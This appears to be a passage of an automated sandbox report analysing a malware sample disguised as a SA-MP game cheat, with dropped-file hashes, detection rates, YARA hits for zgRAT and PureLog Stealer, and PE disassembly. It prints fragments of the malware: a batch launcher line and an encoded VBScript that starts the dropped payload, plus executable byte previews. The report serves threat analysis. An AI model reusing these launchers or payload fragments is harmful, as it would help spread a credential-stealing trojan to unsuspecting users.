                                                  SHA1:9CBF5C6E865AE50CEC25D95EF70F3C8C0F2A6CBF
                                                  SHA-256:AAB95596475CA74CEDE5BA50F642D92FA029F6F74F6FAEAE82A9A07285A5FB97
                                                  SHA-512:2300D8FC857986DC9560225DE36C221C6ECB4F98ADB954D896ED6AFF305C3A3C05F5A9F1D5EF0FC9094355D60327DDDFAFC81A455596DCD28020A9A89EF50E1A
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 50%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....;.d.........." .................'... ...@....@.. ....................................@.................................\'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B.................'......H.......l....^..........t...............................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k:..AOg.......s..t".5.
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):32256
                                                  Entropy (8bit):5.631194486392901
                                                  Encrypted:false
                                                  SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                  MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                  SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                  SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                  SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 25%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....v..........n.... ........@.. ....................................@.....................................O.................................................................................... ............... ..H............text...tt... ...v.................. ..`.rsrc................x..............@..@.reloc...............|..............@..B................P.......H........c...1..........._..h....................................................................................................................................................................Q.1k...].~g.v................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):85504
                                                  Entropy (8bit):5.8769270258874755
                                                  Encrypted:false
                                                  SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                  MD5:E9CE850DB4350471A62CC24ACB83E859
                                                  SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                  SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                  SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 71%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d.........." .....F...........e... ........@.. ...............................@....@..................................e..S.................................................................................... ............... ..H............text....E... ...F.................. ..`.rsrc................H..............@..@.reloc...............L..............@..B.................e......H.......p...(j..................................................................................c|w{.ko.0.g+..v..}.YG.....r....&6?..4...q.1...#..........'.u..,..nZ.R;.)./.S... ..[j.9JLX....CM3.E...P<..Q.@...8....!........_.D..~=d].s`.O."*..F...^...2:.I.$\..b...y..7m..N.lV..ez...x%.......t.K...p>.fH...a5W.........i.......U(......BhA.-..T..R.j.06.8.@......|.9../..4.CD....T{.2..#=.L..B..N...f(.$.v[.Im..%r..d.h...\.]e..lpHP...^.FW.............X...E..,...?.........k
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):23552
                                                  Entropy (8bit):5.519109060441589
                                                  Encrypted:false
                                                  SSDEEP:384:RlLUkmZJzLSTbmzQ0VeUfYtjdrrE2VMRSKOpRP07PUbTr4e16AKrl+7T:RlYZnV7YtjhrfMcKOpjb/9odg7T
                                                  MD5:0B2AFABFAF0DD55AD21AC76FBF03B8A0
                                                  SHA1:6BB6ED679B8BEDD26FDEB799849FB021F92E2E09
                                                  SHA-256:DD4560987BD87EF3E6E8FAE220BA22AA08812E9743352523C846553BD99E4254
                                                  SHA-512:D5125AD4A28CFA2E1F2C1D2A7ABF74C851A5FB5ECB9E27ECECAF1473F10254C7F3B0EEDA39337BD9D1BEFE0596E27C9195AD26EDF34538972A312179D211BDDA
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 8%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......d...........!.....T...........s... ........@.. ..............................vX....@.................................Xs..S.................................................................................... ............... ..H............text....S... ...T.................. ..`.rsrc................V..............@..@.reloc...............Z..............@..B.................s......H.......PO...$...........N......................................................................................................................................................................6...GN..n.....................................................................#...+...3...;...C...S...c...s...................................................................................................................................................................................
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  File Type:MSVC .res
                                                  Category:dropped
                                                  Size (bytes):1224
                                                  Entropy (8bit):4.435108676655666
                                                  Encrypted:false
                                                  SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                  MD5:931E1E72E561761F8A74F57989D1EA0A
                                                  SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                  SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                  SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                  Malicious:false
                                                  Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                  Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):4608
                                                  Entropy (8bit):3.9320340249067818
                                                  Encrypted:false
                                                  SSDEEP:48:6qJ7PtcjM7Jt8Bs3FJsdcV4MKe27yVGvqBHeOulajfqXSfbNtm:1PlPc+Vx9Mtvk4cjRzNt
                                                  MD5:0E20396284067C3264EED6182AE27C8D
                                                  SHA1:5DF9AF8C8D4B1C5A083A92F202B2AE45562B9B1B
                                                  SHA-256:531977D821DB63274CA5382A6A5D2335549DC7B6ECE369BDF01FB64EF79D39D1
                                                  SHA-512:4ECCC341342AF4E2B615DED1C42FAAE617FECFF3667E11970D8B2C9794433E9E4D3A49B266248C46ED5242CC1AABBC24D94BFD5E70E15B54CB10421625FE474E
                                                  Malicious:true
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......g.............................'... ...@....@.. ....................................@.................................<'..O....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B................p'......H.......(!................................................................(....*.0..!.......r...pre..p.{....(....(....&..&..*....................0..........ri..p(....&..&..*....................0..K.......s.......}...........s....s....(....~....-........s.........~....s....(....*..(....*.BSJB............v4.0.30319......l.......#~..@.......#Strings....4.......#US.........#GUID....... ...#Blob...........WU........%3................................................................
                                                  Process:C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe
                                                  File Type:ASCII text, with CRLF line terminators
                                                  Category:dropped
                                                  Size (bytes):114
                                                  Entropy (8bit):5.213562304216253
                                                  Encrypted:false
                                                  SSDEEP:3:z0XPd1KH4CruLBLTxhPKnFfW58+XApKBHX6A3p01y8vjTc:wXP3j+ExTOfW6+XApKB3LpUy8vjA
                                                  MD5:EC4930435249E865EC0910B90CE34010
                                                  SHA1:E00242BA6B91ABE0291EE6C003C7CDA9F280A20C
                                                  SHA-256:AECACCC8288E076EFA186171EAB1CE946B8C0438E607F00A442B04E1E080DFBB
                                                  SHA-512:F1BB3A20BD279B62B94349D253B64A4BB9227FA214785E265B5F5457A552BDDB141FAEA48109ED80A6D77F34C8BA68FD2911DAA178893DAEE52259E89A6B80AA
                                                  Malicious:false
                                                  Preview:%LSfhCeWTlxP%%apyNizugZHqajNf%..%PndaGeSTDjoeg%"C:\msportComWin/BridgePortsurrogateserverref.exe"%sJkBzDAYJHYivXD%
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:ASCII text, with very long lines (708), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):708
                                                  Entropy (8bit):5.886236415284474
                                                  Encrypted:false
                                                  SSDEEP:12:wXMVWBntIN46vytDRdgbfIzyhyjKtjf+dCJDXcMv8X4NdpBSr3JqSc8oT:ZVOtgFvIDUbfIz928k8XAdjO3JqSc8Q
                                                  MD5:8EC242BF9C281FBC36A3977524AFAB87
                                                  SHA1:DAF663C31B82E4DB8162C26124153A37E1A1CFFD
                                                  SHA-256:CAABEFEA5C751A1ECF81734D2B7FD62F3B3ABE5CB3ECC755E71D58EA9992604A
                                                  SHA-512:91FC3DB79B11291B7AB5A3460B77CAB3A85545C00C795B51D7A36542EAF999E7D107D09BD8A5494DFD503E9FCB76DAEC10039680616F9C4D04708D93CCB61F3B
                                                  Malicious:false
                                                  Preview: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
                                                  Process:C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):2002944
                                                  Entropy (8bit):7.567943716522346
                                                  Encrypted:false
                                                  SSDEEP:24576:CEmEVLqBMwOk+ADUZjmwMUuTEZ/iJJjhs4P/r+iHtxItZPFtOObxoD24TKf9jUW:1Z+qwOZFM+aJJbL+iNuuMxoyW29
                                                  MD5:5F80A11E82CC7495CF5AD7DF3D052721
                                                  SHA1:3A20EB31195A97CF5DA7D3C20C1B8C4913B95A13
                                                  SHA-256:851AA5F3636700F9BB71A4C0D040255F19871BA306F87D9F66B39F3B207EC15B
                                                  SHA-512:7ACDD2A4F5170212BEABEBA86DCB7A6BE74C4C83815DB3BB328D6541F6A259EC3C6FF469F103EB125163371F103AE3060404E1C34622F2D4D9CB34D2CC7B3C0D
                                                  Malicious:true
                                                  Yara Hits:
                                                  • Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: C:\msportComWin\BridgePortsurrogateserverref.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\msportComWin\BridgePortsurrogateserverref.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\msportComWin\BridgePortsurrogateserverref.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\msportComWin\BridgePortsurrogateserverref.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\msportComWin\BridgePortsurrogateserverref.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\msportComWin\BridgePortsurrogateserverref.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\msportComWin\BridgePortsurrogateserverref.exe, Author: Joe Security
                                                  • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: C:\msportComWin\BridgePortsurrogateserverref.exe, Author: Joe Security
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s..g................................ ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text....... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.......................t...}............................................0..........(.... ........8........E....*...9.......)...8%...(.... ....~....{}...:....& ....8....*(.... ....8....(.... ....~....{m...9....& ....8........0.......... ........8........E....................y.......8....~....:.... ....~....{....:....& ....8....~....((... .... .... ....s....~....(,....... ....~....{....9u...& ....8j......... ....8Z.......~....(0...~....(4... ....<2... ........8&...8*... ....~.
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:ASCII text, with very long lines (855), with no line terminators
                                                  Category:dropped
                                                  Size (bytes):855
                                                  Entropy (8bit):5.9063512067828485
                                                  Encrypted:false
                                                  SSDEEP:24:gQimqzRqoJyWij1dnpChDQEXP7IXYcOITH3B+R65j:zxwRqJn0h0EXP8gYxEC
                                                  MD5:18D065D4C287BAAE75B1C91DEC6D17BA
                                                  SHA1:F641A93D8DC2973D4F1EB84F7829C48344C08660
                                                  SHA-256:642A77AB321A1EB054B14A656BCB25623CA63A3C7946DE3462DCB640D35C102C
                                                  SHA-512:45D304786B960169DF6D3363F5FD39D44A0498E8ED3AF14E6153C414B8EA15669BDE7B0362FF97C8BD65C0A489367535414DAD9C20C3C7E4788D28CDEC237DCE
                                                  Malicious:false
                                                  Preview:pIBnHLf4kaTtO7dqktPgZcHbtkCicvYnwmE3sOpJujjElpUrelodzVbMAk4gI6cyCq6l3k7WDGw03D0DQVE0G5xbL12ITIAxGuC4tsx3nSZtilT7t1Qx1lrG2faCryC4F8tJB5ThiKNyfD2ji5Zc2N5fC5COSuLyPfok2J5yhtPrY3lym0ewZjC1CNGG3FOx8Yi9ZSrY9k5I8OGITNmbQZYqdwhoDz4bebs9VlZTJFxzn33yH7wqdwgj92gnvDVJqeoggHxrySSLmjCj2thFDO8r5J9cEvhGunIJPWR9JE2KeV6a07uCfQGcg6lXHVnCuMa9b2Ugbh58VxNjMjmHAfkegqnSv42ybzZR4787mOk8UHGstBLhsfBPm6cuPCuhoGhgX5oOkpew5lJZk4ittVG5xKp8fOskdDTOkjUyW76DAPUAxCKUeAxTAlsNPqsW64S1S4zAkuXwYC5i0pLdDXGdPAO81HiqOjGG6cs2NKutnB47qKWkfPTjyzlRq0JcLrhz5zlX7TP2nWzOFQSqv7K9QhRH1aLWBSh6eFC1i8nM9a5cAXMaicrOgijXheggH31Vy2u9NbIwU89zmzHdOvxilTa5goTEbGEGiknHnMMHT43hjtvrWCSWFSuecydiHEUN43QBMA0BiqPqa3Wx3lrYxsAP0Jpyto9PjpnpctfWMRxYDDEicqpgW6ZL2ALCUBS4r9HuQqUJFVMg4mMxEGWD8c3nQbxcicBK93qE5TSwWfaBt3RQyX7OpO5OGeey31lnTChB5I1uxjrdC23WKgnLexeu8b8azd3e4xsrVPVqfNaGhbMNkHoWOaIghwDdKb5TqNjPKMB4L7pRWYMgPu0
                                                  Process:C:\msportComWin\BridgePortsurrogateserverref.exe
                                                  File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                  Category:dropped
                                                  Size (bytes):2002944
                                                  Entropy (8bit):7.567943716522346
                                                  Encrypted:false
                                                  SSDEEP:24576:CEmEVLqBMwOk+ADUZjmwMUuTEZ/iJJjhs4P/r+iHtxItZPFtOObxoD24TKf9jUW:1Z+qwOZFM+aJJbL+iNuuMxoyW29
                                                  MD5:5F80A11E82CC7495CF5AD7DF3D052721
                                                  SHA1:3A20EB31195A97CF5DA7D3C20C1B8C4913B95A13
                                                  SHA-256:851AA5F3636700F9BB71A4C0D040255F19871BA306F87D9F66B39F3B207EC15B
                                                  SHA-512:7ACDD2A4F5170212BEABEBA86DCB7A6BE74C4C83815DB3BB328D6541F6A259EC3C6FF469F103EB125163371F103AE3060404E1C34622F2D4D9CB34D2CC7B3C0D
                                                  Malicious:true
                                                  Antivirus:
                                                  • Antivirus: ReversingLabs, Detection: 83%
                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...s..g................................ ........@.. ....................................@.....................................K....... ............................................................................ ............... ..H............text....... ...................... ..`.rsrc... ...........................@....reloc..............................@..B........................H.......................t...}............................................0..........(.... ........8........E....*...9.......)...8%...(.... ....~....{}...:....& ....8....*(.... ....8....(.... ....~....{m...9....& ....8........0.......... ........8........E....................y.......8....~....:.... ....~....{....:....& ....8....~....((... .... .... ....s....~....(,....... ....~....{....9u...& ....8j......... ....8Z.......~....(0...~....(4... ....<2... ........8&...8*... ....~.
                                                  Process:C:\Users\user\Desktop\SAMP_CHEAT_ATVECHAU2.exe.bin.exe
                                                  File Type:data
                                                  Category:dropped
                                                  Size (bytes):248
                                                  Entropy (8bit):5.994697168101575
                                                  Encrypted:false
                                                  SSDEEP:6:GQvwqK+NkLzWbHa/818nZNDd3RL1wQJRYmfvv9H4f7sIG/V:GQ2MCzWLaG4d3XBJzfvK8
                                                  MD5:528D2D62B3A0A43E28F6C5BC9E59FB49
                                                  SHA1:B8347B3F11FDB951BF4C930BEF813180C42F98C1
                                                  SHA-256:9D271DDB2A3DE2347DB1800F94865BAB4758E8F89760F7F0FC6368EB14A9597B
                                                  SHA-512:A208E41F97A080AB5550632DAA10AC7D4D43CA603207406DF14E749765662089F38FF52FECED3083DBCB08DAA2821E9FC6DF511FA1A1F18B4B9E8E38F68FA171
                                                  Malicious:false
                                                  Preview:#@~^3wAAAA==j.Y~q/4?t.V^~',Z.+mYn6(L+1O`r.?1.rwDRUtnVsE*@#@&.U^DbwO UV+n2vFT!Zb@#@&j.Y,./4?4nV^PxP;DnCD+r(%+1Y`r.jmMkaY ?4n^VE#@#@&.ktj4.VV ]!x~J;lJ:daWMYZK:qrxJzX9$*VL5+4\$n1%|&o%3^?m|.|OWS0oFM2KO pn"oVe*Xvt*Ie!VabS`,.jR(CYr~~!BPWC^/+X0cAAA==^#~@.
                                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                  Entropy (8bit):7.505318062567441
                                                  TrID:
                                                  • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                  • Win32 Executable (generic) a (10002005/4) 49.97%
                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                  • DOS Executable Generic (2002/1) 0.01%
                                                  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                  File name:SAMP_CHEAT_ATVECHAU2.exe.bin.exe
                                                  File size:2'324'826 bytes
                                                  MD5:be4ae5e0b545e43608ae6a60ce297871
                                                  SHA1:ded512ee44ed38b7a6541b4e1d797387a27a5d93
                                                  SHA256:076c80010cb400aa03881eb5d88c6e2e4677c0d405255c48154bcf780e549533
                                                  SHA512:45aafc3ec5787b1bf143a1d6b9f8ce79447157879c684849486d87a3a7b357862688016809277ff2c9e57a6d06a0613e12009c5a279d07ced4ecc3b3bc9cd0c3
                                                  SSDEEP:24576:2TbBv5rUyXVoEmEVLqBMwOk+ADUZjmwMUuTEZ/iJJjhs4P/r+iHtxItZPFtOObx5:IBJvZ+qwOZFM+aJJbL+iNuuMxoyW29L
                                                  TLSH:9FB5C012B5D28E33C2A44731466B063D56A4DB263662EF6B360F20966D577F08F336B3
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x_c.<>..<>..<>......1>.......>......$>...I..>>...I../>...I..+>...I...>..5F..7>..5F..;>..<>..)?...I...>...I..=>...I..=>...I..=>.
                                                  Icon Hash:1515d4d4442f2d2d
                                                  Entrypoint:0x41f530
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows gui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                  DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x6220BF8D [Thu Mar 3 13:15:57 2022 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:5
                                                  OS Version Minor:1
                                                  File Version Major:5
                                                  File Version Minor:1
                                                  Subsystem Version Major:5
                                                  Subsystem Version Minor:1
                                                  Import Hash:12e12319f1029ec4f8fcbed7e82df162
                                                  Instruction
                                                  call 00007F9F00BE8D2Bh
                                                  jmp 00007F9F00BE863Dh
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  push ebp
                                                  mov ebp, esp
                                                  push esi
                                                  push dword ptr [ebp+08h]
                                                  mov esi, ecx
                                                  call 00007F9F00BDB487h
                                                  mov dword ptr [esi], 004356D0h
                                                  mov eax, esi
                                                  pop esi
                                                  pop ebp
                                                  retn 0004h
                                                  and dword ptr [ecx+04h], 00000000h
                                                  mov eax, ecx
                                                  and dword ptr [ecx+08h], 00000000h
                                                  mov dword ptr [ecx+04h], 004356D8h
                                                  mov dword ptr [ecx], 004356D0h
                                                  ret
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  push ebp
                                                  mov ebp, esp
                                                  push esi
                                                  mov esi, ecx
                                                  lea eax, dword ptr [esi+04h]
                                                  mov dword ptr [esi], 004356B8h
                                                  push eax
                                                  call 00007F9F00BEBACFh
                                                  test byte ptr [ebp+08h], 00000001h
                                                  pop ecx
                                                  je 00007F9F00BE87CCh
                                                  push 0000000Ch
                                                  push esi
                                                  call 00007F9F00BE7D89h
                                                  pop ecx
                                                  pop ecx
                                                  mov eax, esi
                                                  pop esi
                                                  pop ebp
                                                  retn 0004h
                                                  push ebp
                                                  mov ebp, esp
                                                  sub esp, 0Ch
                                                  lea ecx, dword ptr [ebp-0Ch]
                                                  call 00007F9F00BDB402h
                                                  push 0043BEF0h
                                                  lea eax, dword ptr [ebp-0Ch]
                                                  push eax
                                                  call 00007F9F00BEB589h
                                                  int3
                                                  push ebp
                                                  mov ebp, esp
                                                  sub esp, 0Ch
                                                  lea ecx, dword ptr [ebp-0Ch]
                                                  call 00007F9F00BE8748h
                                                  push 0043C0F4h
                                                  lea eax, dword ptr [ebp-0Ch]
                                                  push eax
                                                  call 00007F9F00BEB56Ch
                                                  int3
                                                  jmp 00007F9F00BED007h
                                                  int3
                                                  int3
                                                  int3
                                                  int3
                                                  push 00422900h
                                                  push dword ptr fs:[00000000h]
                                                  Programming Language:
                                                  • [ C ] VS2008 SP1 build 30729
                                                  • [IMP] VS2008 SP1 build 30729
                                                  Name | Virtual Address | Virtual Size | Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT | 0x3d070 | 0x34 | .rdata
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT | 0x3d0a4 | 0x50 | .rdata
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x64000 | 0xdff8 | .rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x72000 | 0x233c | .reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG | 0x3b11c | 0x54 | .rdata
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x355f8 | 0x40 | .rdata
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_IAT | 0x33000 | 0x278 | .rdata
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x3c5ec | 0x120 | .rdata
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                  Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                  .text | 0x1000 | 0x31bdc | 0x31c00 | 2831bb8b11e3209658a53131886cdf98 | False | 0.5909380888819096 | data | 6.712962136932442 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rdata | 0x33000 | 0xaec0 | 0xb000 | 042f11346230ca5aa360727d9908e809 | False | 0.4579190340909091 | data | 5.261605615899847 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .data | 0x3e000 | 0x24720 | 0x1000 | 9670b581969e508258d8bc903025de5e | False | 0.451416015625 | data | 4.387459135575936 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .didat | 0x63000 | 0x190 | 0x200 | c83554035c63bb446c6208d0c8fa0256 | False | 0.4453125 | data | 3.3327310103022305 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  .rsrc | 0x64000 | 0xdff8 | 0xe000 | ba08fbcd0ed7d9e6a268d75148d9914b | False | 0.6373639787946429 | data | 6.638661032196024 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc | 0x72000 | 0x233c | 0x2400 | 40b5e17755fd6fdd34de06e5cdb7f711 | False | 0.7749565972222222 | data | 6.623012966548067 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                  Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                  PNG | 0x64650 | 0xb45 | PNG image data, 93 x 302, 8-bit/color RGB, non-interlaced | English | United States | 1.0027729636048528
                                                  PNG | 0x65198 | 0x15a9 | PNG image data, 186 x 604, 8-bit/color RGB, non-interlaced | English | United States | 0.9363390441839495
                                                  RT_ICON | 0x66748 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 256, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.47832369942196534
                                                  RT_ICON | 0x66cb0 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1024, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.5410649819494585
                                                  RT_ICON | 0x67558 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 2304, resolution 2834 x 2834 px/m, 256 important colors | English | United States | 0.4933368869936034
                                                  RT_ICON | 0x68400 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 2834 x 2834 px/m | English | United States | 0.5390070921985816
                                                  RT_ICON | 0x68868 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 2834 x 2834 px/m | English | United States | 0.41393058161350843
                                                  RT_ICON | 0x69910 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 2834 x 2834 px/m | English | United States | 0.3479253112033195
                                                  RT_ICON | 0x6beb8 | 0x3d71 | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9809269502193401
                                                  RT_DIALOG | 0x70588 | 0x286 | data | English | United States | 0.5092879256965944
                                                  RT_DIALOG | 0x70358 | 0x13a | data | English | United States | 0.60828025477707
                                                  RT_DIALOG | 0x70498 | 0xec | data | English | United States | 0.6991525423728814
                                                  RT_DIALOG | 0x70228 | 0x12e | data | English | United States | 0.5927152317880795
                                                  RT_DIALOG | 0x6fef0 | 0x338 | data | English | United States | 0.45145631067961167
                                                  RT_DIALOG | 0x6fc98 | 0x252 | data | English | United States | 0.5757575757575758
                                                  RT_STRING | 0x70f68 | 0x1e2 | data | English | United States | 0.3900414937759336
                                                  RT_STRING | 0x71150 | 0x1cc | data | English | United States | 0.4282608695652174
